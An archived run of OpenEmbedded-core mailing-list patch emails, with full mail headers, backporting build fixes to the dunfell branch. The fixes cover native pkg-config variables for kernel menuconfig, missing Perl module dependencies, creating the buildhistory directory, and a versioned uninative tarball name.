         stzM8Qz78ZOLIqnqJ2Tu5A7203UiiDTPMa7BJmIMKzXWDT5OPTxmAp1Su6PE0bh5+L5F
         lPPBEUzbBbAQHqGRXkprKE+YK9s7GHwDcAF+NaodsnQwFFH5KKKW5CCd1IL5XmtPKK8z
         i3YMEJd6yzpzgbPXMOlrEejOBaVekkEPeNCAoDT0JWQYJjS1C0qCkjvO/KEj5aqKU4Kk
         V36kafyb3fkmi7vRe+v4IUZ6MFs0/y7Ln38UGoJdwS21G1mgqbv8YErLve+MD4JRfzfU
         792w==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=Q/rjlvK/axnWLbDMS0ZHZC2K9h+cBOFreGdP7kdLmo0=;
        b=xEq0TX96lobX+A1tO/il/dtQXbyLHGD/WYPKI1GpbINGiFk0oh9X+PvqAGpmMA8jfO
         K/2cPznpbLWESWkzUSDJpAJ9h7xURKu9iY5lE5B97mv0bgz7dXgv0GPn1mqxaJDeMoly
         P1gzpk2Lct2hpxQpkn21bAtEqTRizc2oboZWWJxFML63rE1+7RX64KSZ+uhcg7Ug6uUX
         2BMpp4500hGUFf4e4xeuZZQ6q3GZwTluDI8Wtp4gpseL0anovyOqpHNvXk8IYQCbpb63
         JINnSrmAvp2ywtosgmYauTRxk2i9flForMtSyi3TKlUn18cVci7dctJkExaoJXcl72ly
         UZpw==
X-Gm-Message-State: AOAM5320NrdC1joPs2x5u5Mk3HR888JceJusN77rMQuEn8f4D3ed0a8l
	3KSCg5VK8KqPdqargnhA4A+/Nx9OrsKqu/dHivk=
X-Google-Smtp-Source: 
 ABdhPJwmTWok9f6hck3jFtuDgf5nT2FRAhZ+z7/vQhqmJCvvoXldDU+2/l3L9Vzs8IX1oxjeGymo5Q==
X-Received: by 2002:a63:4386:0:b0:378:b62e:28b3 with SMTP id
 q128-20020a634386000000b00378b62e28b3mr20795162pga.442.1646406315853;
        Fri, 04 Mar 2022 07:05:15 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.05.14
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:05:15 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 14/18] cml1.bbclass: Handle ncurses-native being
 available via pkg-config
Date: Fri,  4 Mar 2022 05:04:22 -1000
Message-Id: 
 <dc6b20475a69c9fbab9a97a93119aeedf54deb23.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:05:18 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162733

From: Nathan Rossi <nathan@nathanrossi.com>

The linux kernel will by default use pkg-config to get ncurses(w) paths,
falling back to absolute path checks otherwise. If the build host does
not have ncurses installed this will fail as pkg-config will not search
the native sysroot for ncurses.

To more all kernel/kconfig sources, inject the equivalent native
pkg-config variables similar to what is done by the pkg-config-native
script. This only affects the menuconfig python task itself and the
oe_terminal call inside it.

(cherry picked from commit abb95c421bb67d452691819e3f63dabd02e2ba37)
Signed-off-by: Nathan Rossi <nathan@nathanrossi.com>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 meta/classes/cml1.bbclass | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/meta/classes/cml1.bbclass b/meta/classes/cml1.bbclass
index 8ab240589a..46a19fce32 100644
--- a/meta/classes/cml1.bbclass
+++ b/meta/classes/cml1.bbclass
@@ -36,6 +36,14 @@ python do_menuconfig() {
     except OSError:
         mtime = 0
 
+    # setup native pkg-config variables (kconfig scripts call pkg-config directly, cannot generically be overriden to pkg-config-native)
+    d.setVar("PKG_CONFIG_DIR", "${STAGING_DIR_NATIVE}${libdir_native}/pkgconfig")
+    d.setVar("PKG_CONFIG_PATH", "${PKG_CONFIG_DIR}:${STAGING_DATADIR_NATIVE}/pkgconfig")
+    d.setVar("PKG_CONFIG_LIBDIR", "${PKG_CONFIG_DIR}")
+    d.setVarFlag("PKG_CONFIG_SYSROOT_DIR", "unexport", "1")
+    # ensure that environment variables are overwritten with this tasks 'd' values
+    d.appendVar("OE_TERMINAL_EXPORTS", " PKG_CONFIG_DIR PKG_CONFIG_PATH PKG_CONFIG_LIBDIR PKG_CONFIG_SYSROOT_DIR")
+
     oe_terminal("sh -c \"make %s; if [ \\$? -ne 0 ]; then echo 'Command failed.'; printf 'Press any key to continue... '; read r; fi\"" % d.getVar('KCONFIG_CONFIG_COMMAND'),
                 d.getVar('PN') + ' Configuration', d)
 

From patchwork Fri Mar  4 15:04:23 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4688
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 03430C4332F
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:05:20 +0000 (UTC)
Received: from mail-pj1-f50.google.com (mail-pj1-f50.google.com
 [209.85.216.50])
 by mx.groups.io with SMTP id smtpd.web12.7918.1646406318982866116
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:19 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=J7bsx9Wp;
 spf=softfail (domain: sakoman.com, ip: 209.85.216.50,
 mailfrom: steve@sakoman.com)
Received: by mail-pj1-f50.google.com with SMTP id
 kx1-20020a17090b228100b001bf2dd26729so1075893pjb.1
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:18 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=Hq/K6HUBdgjS5aWirAuMLAeknnFygmYIfmFuy6Y6/oQ=;
        b=J7bsx9WpVlkeZ7PuGf2b64XKvTx4hqtK9dE3q4mv99D+doXWTV+zQKzYe2sd2rO5wU
         YW80Rsi23qWZLEv4cuJIBp7yiHACm0PM2W6qLx7IwO7Vcw8pen1DG/x8oUrqYzDeo2PJ
         rF5yhqDM9/f132x71+RJwQaKrhjrGYhUJoT5k1ekBvgFyq7M3Id/dUcZXxB/cBF8G0Y7
         SBijd1WGlbBE23h55gSpVRpj1M6sRTPEVvtPkECUQrXxvh8TC2Cy2z6yS9SNkgZccKu4
         xa8ViLnxzxg9vecINbQ5u/tFxXADsZNff7NTRAO8rvH3RGp2a3U/2gW38zShswhV1maf
         FTJA==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=Hq/K6HUBdgjS5aWirAuMLAeknnFygmYIfmFuy6Y6/oQ=;
        b=G4c7qECRlk4CiNZbbaeabRnqhmOP/Q2Ozhpd1vXrsbcc+CuXkvBlpSLhQlINZJU18q
         QWzSQjjgakVAz3oaYF9ZKuuuH2UmTkG6/NeICJ+TwU8r7MPo6eD7gh74djoG/bMoFDKj
         o/JlpUiMd/en5EIkig6V+2sgzYpBWFrx6HA2Eu3dB8vFRnlmULUxJID0y/r3IivpLDdZ
         srB51z6orFZqmy/Du+JKl8pmXrCGGIdIzTCHsmCYtb6rs8jwsGkPN5Rf2aXfW2s7IBDy
         7uHnJuKBrGjGc2wG1r6r2xmSe1G12yLCGIbv3JOb0YZ0ga4mrZkurvWVGjMTYZJQmvVD
         +2Yg==
X-Gm-Message-State: AOAM531I73xpkpYAi9qHQsRmzT9p5Ih+wLTOs9ZfF8xlCC+8N5h+VznA
	Pw4pVmwyYI9W3fG3jVdwO1xsFcAhRATbK3vD+cw=
X-Google-Smtp-Source: 
 ABdhPJxMnozgeJom5DLDjjMMSLwMkq7XOHdF93kp6YZ2R+++Cljqur1n+EAK4V32BtuXKRxy/3zIyw==
X-Received: by 2002:a17:90a:7884:b0:1be:ef64:2212 with SMTP id
 x4-20020a17090a788400b001beef642212mr11015055pjk.53.1646406317904;
        Fri, 04 Mar 2022 07:05:17 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.05.16
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:05:17 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 15/18] libxml-parser-perl: Add missing RDEPENDS
Date: Fri,  4 Mar 2022 05:04:23 -1000
Message-Id: 
 <6e98fdf7832fed3d93645ed69f62c8df5e89b96b.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:05:20 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162734

From: Richard Purdie <richard.purdie@linuxfoundation.org>

Running the ptest package in an image alone highlighted missing module
dependencies. Add them to fix those errors.

Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit 3859f49db2d694c7b63fdbe25be0018afba5c738)
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb | 1 +
 1 file changed, 1 insertion(+)

diff --git a/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb b/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
index bc154bbdc5..ef2b292352 100644
--- a/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
+++ b/meta/recipes-devtools/perl/libxml-parser-perl_2.46.bb
@@ -53,6 +53,7 @@ do_install_ptest() {
 	chown -R root:root ${D}${PTEST_PATH}/samples
 }
 
+RDEPENDS_${PN} += "perl-module-carp perl-module-file-spec"
 RDEPENDS_${PN}-ptest += "perl-module-filehandle perl-module-if perl-module-test perl-module-test-more"
 
 BBCLASSEXTEND="native nativesdk"

From patchwork Fri Mar  4 15:04:24 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4689
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 0854DC433F5
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:05:22 +0000 (UTC)
Received: from mail-pl1-f170.google.com (mail-pl1-f170.google.com
 [209.85.214.170])
 by mx.groups.io with SMTP id smtpd.web10.7854.1646406321119058237
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:21 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=7u/MFIBU;
 spf=softfail (domain: sakoman.com, ip: 209.85.214.170,
 mailfrom: steve@sakoman.com)
Received: by mail-pl1-f170.google.com with SMTP id bd1so7936774plb.13
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:21 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=r4hN4GBzIIyUuusjGSnt32Fbvnk84gHPgl4x/zvUKzc=;
        b=7u/MFIBUXiNRJK3vpq00O9g4woHVic+XgqdCKc7w1kOp++WZEBUMJfwrHUgghNXLUU
         6bhcY1wIn1oCVmNxHfgfRuTM+M8+mQPiy1Pw7eT8q4EgAQD19HCcg61HQToqBQ170MJJ
         d/hP4yItz95yApehCrx856iNmYdhF6wfyQL4ftw5vCHWx8XLulTiwXbioFtmbnOp9GFQ
         FDdrEe7Bk1bTyC8n1m8VS1JIVUNZzwXsC7nrh8gUQr7Hmq0QHjB8zg11dZ7/0XjoGM2+
         vLNZc262LJxElARpdWrfO+vQvUftBeMeIY9OXuGrVRD7eH4s3sswesLVFUnJUQ50la0F
         MGNw==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=r4hN4GBzIIyUuusjGSnt32Fbvnk84gHPgl4x/zvUKzc=;
        b=b1/JLx8JAkvzVMyPNOCyj0Nv5pc4jzdp5PB0wcP+rBacw4jX1Z0yiqWNkwXV7NWHXa
         Bk4IYQbjthgZA8SzBr4QqNiUCA+Ru1vsFSC1tgIbdo4etjvu4cZNt4aTYBcs60HH6Rk4
         RFu/R02Fx7Shwz7DNPsRTU5sLJ3RmDy5y4fRDWrwXwDYVy8gLRkGEo4TuTmcOxpNAwaB
         WQHGDNCXjLmuXvmG4B4lPSlaXq0l7XVh1EewrwzAxXSbWNidmuiP8XKoH5BFFy8Ow9Ry
         IWNtPOWR+u49YQKviyYq8/WGSpj3FSum3OCFqKj+RtP/ZNHeRrEB+I8lzBe/363cCAhy
         Z+Lw==
X-Gm-Message-State: AOAM530TpfY6D1YGSAhVbmrAm+3KkTXo73ROC7Ii9oDqgpvoxQHOWcEb
	GQJxlxBB7J7GuRLIycCU9+n2QzaYIWh8Zby5ofE=
X-Google-Smtp-Source: 
 ABdhPJyXemkAVGG8gqNdBcOKbPXokAcjwCZfEOOZWqKlAoDO7Mh9USMRH1aqQUUnsp2cGRIjWODLMQ==
X-Received: by 2002:a17:90a:d3d1:b0:1bb:fdc5:182 with SMTP id
 d17-20020a17090ad3d100b001bbfdc50182mr11203920pjw.206.1646406320177;
        Fri, 04 Mar 2022 07:05:20 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.05.19
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:05:19 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 16/18] buildhistory.bbclass: create the
 buildhistory directory when needed
Date: Fri,  4 Mar 2022 05:04:24 -1000
Message-Id: 
 <de89dc125758f828a7886012bd9b1c8a1017ef48.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:05:22 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162735

From: Jose Quaresma <quaresma.jose@gmail.com>

When the BUILDHISTORY_RESET is enabled we need to move the
content from BUILDHISTORY_DIR to BUILDHISTORY_OLD_DIR but
when we start a clean build in the first run we don't have the
BUILDHISTORY_DIR so the move of files will fail.

| ERROR: Command execution failed: Traceback (most recent call last):
|  File "/xxx/poky/bitbake/lib/bb/command.py", line 110, in runAsyncCommand
|    commandmethod(self.cmds_async, self, options)
|  File "/xxx/poky/bitbake/lib/bb/command.py", line 564, in buildTargets
|    command.cooker.buildTargets(pkgs_to_build, task)
|  File "/xxx/poky/bitbake/lib/bb/cooker.py", line 1481, in buildTargets
|    bb.event.fire(bb.event.BuildStarted(buildname, ntargets), self.databuilder.mcdata[mc])
|  File "/xxx/home/builder/src/base/poky/bitbake/lib/bb/event.py", line 214, in fire
|    fire_class_handlers(event, d)
|  File "/xxx/poky/bitbake/lib/bb/event.py", line 121, in fire_class_handlers
|    execute_handler(name, handler, event, d)
|  File "/xxx/poky/bitbake/lib/bb/event.py", line 93, in execute_handler
|    ret = handler(event)
|  File "/xxx/poky/meta/classes/buildhistory.bbclass", line 919, in buildhistory_eventhandler
|    entries = [ x for x in os.listdir(rootdir) if not x.startswith('.') ]
| FileNotFoundError: [Errno 2] No such file or directory: '/xxx/buildhistory'

Signed-off-by: Jose Quaresma <quaresma.jose@gmail.com>
Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit 97bc2168da7dbacdfbf79cd70db674363ab84f6b)
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 meta/classes/buildhistory.bbclass | 1 +
 1 file changed, 1 insertion(+)

diff --git a/meta/classes/buildhistory.bbclass b/meta/classes/buildhistory.bbclass
index 2746996cbb..6a1a20653a 100644
--- a/meta/classes/buildhistory.bbclass
+++ b/meta/classes/buildhistory.bbclass
@@ -865,6 +865,7 @@ python buildhistory_eventhandler() {
                 if os.path.isdir(olddir):
                     shutil.rmtree(olddir)
                 rootdir = e.data.getVar("BUILDHISTORY_DIR")
+                bb.utils.mkdirhier(rootdir)
                 entries = [ x for x in os.listdir(rootdir) if not x.startswith('.') ]
                 bb.utils.mkdirhier(olddir)
                 for entry in entries:

From patchwork Fri Mar  4 15:04:25 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4690
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 0863AC433F5
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:05:24 +0000 (UTC)
Received: from mail-pj1-f48.google.com (mail-pj1-f48.google.com
 [209.85.216.48])
 by mx.groups.io with SMTP id smtpd.web11.7954.1646406323500572859
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:23 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=OxLT1nQr;
 spf=softfail (domain: sakoman.com, ip: 209.85.216.48,
 mailfrom: steve@sakoman.com)
Received: by mail-pj1-f48.google.com with SMTP id m22so7594658pja.0
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:23 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=y6nd04w4fgTZTVMWUl9EUzosHL0HHGZS/xm85Wm9Zbw=;
        b=OxLT1nQrH5AeCUNb8J+62UunZcyd+5Dd9MWoeBCWCa9ZvApc9/Mj5ApLRc1uPKLwv3
         I+LR1faRo4to3YgvHV116RMShFC1+BPSPP1muZi7hvFSTraEfHuQ/ecC4EwKvPSX9rKm
         UXFGF8T4e6o1X3QrP83tGFAohNIqXcL75z2Le7EEHmovON3Lm2+mDOWG3ZuS6UPBSlmZ
         rcWGj/zyUG22dBO/MwB5UreFXrSipyR98/sYpKFgDIyQBb4QwHJWrNiYl/KM2Pq2MX5J
         4cbNPYZtFEedlob4v75dZ3if1J77zCN7MPdSRSoB51Bq536o3TdxKiXMIb7i9F6bLMsP
         bXuQ==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=y6nd04w4fgTZTVMWUl9EUzosHL0HHGZS/xm85Wm9Zbw=;
        b=gLJv6SU3E6WiTkMqBu5637n4Vpa93f6nSv0XTIIMTjYvDqGOp961P5csDuqYq8XNda
         n6jVNie+eWONglXM5soLQNhZKA7opVHwMZ6kakHQA79S5pECLM1dab2J2ozUdQzUvPB1
         dDouoi1nYUoEuo9XGwtYvuzfeZ730IS3n/XpAjyM0BJgZER9cHk00DsTKqT8YU/ECXsU
         0qF8i4h3LkCUXm5Sm/S54YmWxVIf3X99gK1SVEHXbIM3HigEeULKgYywCq4+aK7LMM/P
         NKArz8hg9ePdXwOGNPDthVWtZ+VJyWMrxvkZd8Y6YFTgNxlvtV7c6GaLVtKRyYOEuz9S
         K98g==
X-Gm-Message-State: AOAM5328ArofoyATerGpjpaXkOAICCf9ZjUCuu8wT4EK/kR7424hstL9
	iYEgEqDxB16WVNhW1g7Tc4RGHW4AddNwtc1qRG0=
X-Google-Smtp-Source: 
 ABdhPJxNdlQQfmDjyys+qmDwncR4ZBJvJaHECSLeJBcZsZR1Q5cNHnHqquULVAZGT34d0WGiKzGozg==
X-Received: by 2002:a17:90a:604f:b0:1be:e84e:692 with SMTP id
 h15-20020a17090a604f00b001bee84e0692mr11113633pjm.61.1646406322393;
        Fri, 04 Mar 2022 07:05:22 -0800 (PST)
Received: from hexa.router0800d9.com (dhcp-72-253-6-214.hawaiiantel.net.
 [72.253.6.214])
        by smtp.gmail.com with ESMTPSA id
 f194-20020a6238cb000000b004f6ce898c61sm80400pfa.77.2022.03.04.07.05.21
        for <openembedded-core@lists.openembedded.org>
        (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256);
        Fri, 04 Mar 2022 07:05:21 -0800 (PST)
From: Steve Sakoman <steve@sakoman.com>
To: openembedded-core@lists.openembedded.org
Subject: [OE-core][dunfell 17/18] uninative: Add version to uninative tarball
 name
Date: Fri,  4 Mar 2022 05:04:25 -1000
Message-Id: 
 <0ec0e49d0d2a7478efbf20bc3554f0ffba40afa0.1646406001.git.steve@sakoman.com>
X-Mailer: git-send-email 2.25.1
In-Reply-To: <cover.1646406001.git.steve@sakoman.com>
References: <cover.1646406001.git.steve@sakoman.com>
MIME-Version: 1.0
List-Id: <openembedded-core.lists.openembedded.org>
X-Webhook-Received: from li982-79.members.linode.com [45.33.32.79] by
 aws-us-west-2-korg-lkml-1.web.codeaurora.org with HTTPS for
 <openembedded-core@lists.openembedded.org>; Fri, 04 Mar 2022 15:05:24 -0000
X-Groupsio-URL: 
 https://lists.openembedded.org/g/openembedded-core/message/162736

From: Richard Purdie <richard.purdie@linuxfoundation.org>

uninative works via hashes and doesn't need the version in the tarball name but
it does make things easier to inspect in DL_DIR. There were reasons such as
ease of publication of the build tarballs but we can handle those differently
now and the signature issues from the early code aren't an issue now. From 3.4
onwards we can use a version'd name.

[YOCTO #12970]

Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org>
(cherry picked from commit dadba70d6a24d8ebb5576598efffa973151c7218)
Signed-off-by: Steve Sakoman <steve@sakoman.com>
---
 meta/classes/uninative.bbclass               | 2 +-
 meta/conf/distro/include/yocto-uninative.inc | 3 ++-
 2 files changed, 3 insertions(+), 2 deletions(-)

diff --git a/meta/classes/uninative.bbclass b/meta/classes/uninative.bbclass
index 3c7ccd66f4..4412d7c567 100644
--- a/meta/classes/uninative.bbclass
+++ b/meta/classes/uninative.bbclass
@@ -2,7 +2,7 @@ UNINATIVE_LOADER ?= "${UNINATIVE_STAGING_DIR}-uninative/${BUILD_ARCH}-linux/lib/
 UNINATIVE_STAGING_DIR ?= "${STAGING_DIR}"
 
 UNINATIVE_URL ?= "unset"
-UNINATIVE_TARBALL ?= "${BUILD_ARCH}-nativesdk-libc.tar.xz"
+UNINATIVE_TARBALL ?= "${BUILD_ARCH}-nativesdk-libc-${UNINATIVE_VERSION}.tar.xz"
 # Example checksums
 #UNINATIVE_CHECKSUM[aarch64] = "dead"
 #UNINATIVE_CHECKSUM[i686] = "dead"
diff --git a/meta/conf/distro/include/yocto-uninative.inc b/meta/conf/distro/include/yocto-uninative.inc
index 3165fc93b8..6833072cd3 100644
--- a/meta/conf/distro/include/yocto-uninative.inc
+++ b/meta/conf/distro/include/yocto-uninative.inc
@@ -7,8 +7,9 @@
 #
 
 UNINATIVE_MAXGLIBCVERSION = "2.34"
+UNINATIVE_VERSION = "3.4"
 
-UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/3.4/"
+UNINATIVE_URL ?= "http://downloads.yoctoproject.org/releases/uninative/${UNINATIVE_VERSION}/"
 UNINATIVE_CHECKSUM[aarch64] ?= "3013cdda8f0dc6639ce1c80f33eabce66f06b890bd5b58739a6d7a92a0bb7100"
 UNINATIVE_CHECKSUM[i686] ?= "abed500de584aad63ec237546db20cdd0c69d8870a6f8e94ac31721ace64b376"
 UNINATIVE_CHECKSUM[x86_64] ?= "126f4f7f6f21084ee140dac3eb4c536b963837826b7c38599db0b512c3377ba2"

From patchwork Fri Mar  4 15:04:26 2022
Content-Type: text/plain; charset="utf-8"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
X-Patchwork-Submitter: Steve Sakoman <steve@sakoman.com>
X-Patchwork-Id: 4691
Return-Path: <steve@sakoman.com>
X-Spam-Checker-Version: SpamAssassin 3.4.0 (2014-02-07) on
	aws-us-west-2-korg-lkml-1.web.codeaurora.org
Received: from aws-us-west-2-korg-lkml-1.web.codeaurora.org
 (localhost.localdomain [127.0.0.1])
	by smtp.lore.kernel.org (Postfix) with ESMTP id 045EDC433F5
	for <webhook@archiver.kernel.org>; Fri,  4 Mar 2022 15:05:27 +0000 (UTC)
Received: from mail-pl1-f178.google.com (mail-pl1-f178.google.com
 [209.85.214.178])
 by mx.groups.io with SMTP id smtpd.web10.7856.1646406326744935499
 for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:26 -0800
Authentication-Results: mx.groups.io;
 dkim=pass header.i=@sakoman-com.20210112.gappssmtp.com header.s=20210112
 header.b=IzJoCXL0;
 spf=softfail (domain: sakoman.com, ip: 209.85.214.178,
 mailfrom: steve@sakoman.com)
Received: by mail-pl1-f178.google.com with SMTP id z2so7960202plg.8
        for <openembedded-core@lists.openembedded.org>;
 Fri, 04 Mar 2022 07:05:26 -0800 (PST)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=sakoman-com.20210112.gappssmtp.com; s=20210112;
        h=from:to:subject:date:message-id:in-reply-to:references:mime-version
         :content-transfer-encoding;
        bh=Mp07xbDiLsMGi0wH9J+TvxI08miDSgjc/tJGGeDzl6I=;
        b=IzJoCXL0IIuo4SaGP5b3ZEiAzB3u4OebKhgIY8ns2ZoacFawIrYrY3u304IRN/vwAm
         PzjuGrz2fikyIjN6Kc5oZ0nl0dTxFJCbGOvMfsfOcbwvJfvlf0zG2hYIB6KhPwPtL3vr
         eZw25y7lxr7eDG8c9Ggo2Hn/zkQib3DLqAQHistiGVq8lbQJbkgYn7EpK+4PlBn84BDd
         cQw/YyBu56t8Fj2yJ8shFbJwgHNPGKvyHo3uOKxZkb09CxgYJ7AIckaHTOtloPKMTjlP
         FKfXP2qVziFw20Y6e88tLBZWwfHXVveaWkTfAku008mOthPWrkDUhCGowZA/0RLPindu
         Wr+w==
X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=1e100.net; s=20210112;
        h=x-gm-message-state:from:to:subject:date:message-id:in-reply-to
         :references:mime-version:content-transfer-encoding;
        bh=Mp07xbDiLsMGi0wH9J+TvxI08miDSgjc/tJGGeDzl6I=;
        b=DBbI141nvgmRJ26wOknKyNUpZT/9uoC5SvyJa/EiF7C+M/+4siiEXITMMsesA6X0oy
         NBJFa4Q6dGH4oNaDIlFOr+XXXRJbJ1lO2uRM6LXx1Nz0Cg4UhDLCB5FbRHSsl66/9lWP
         cYXq5KW9GJVvLeRtZuW5rU2rmEB9Ogy/pOh6/6enI3kXHgOFhstxNE3ksWoV4+1EvrJs
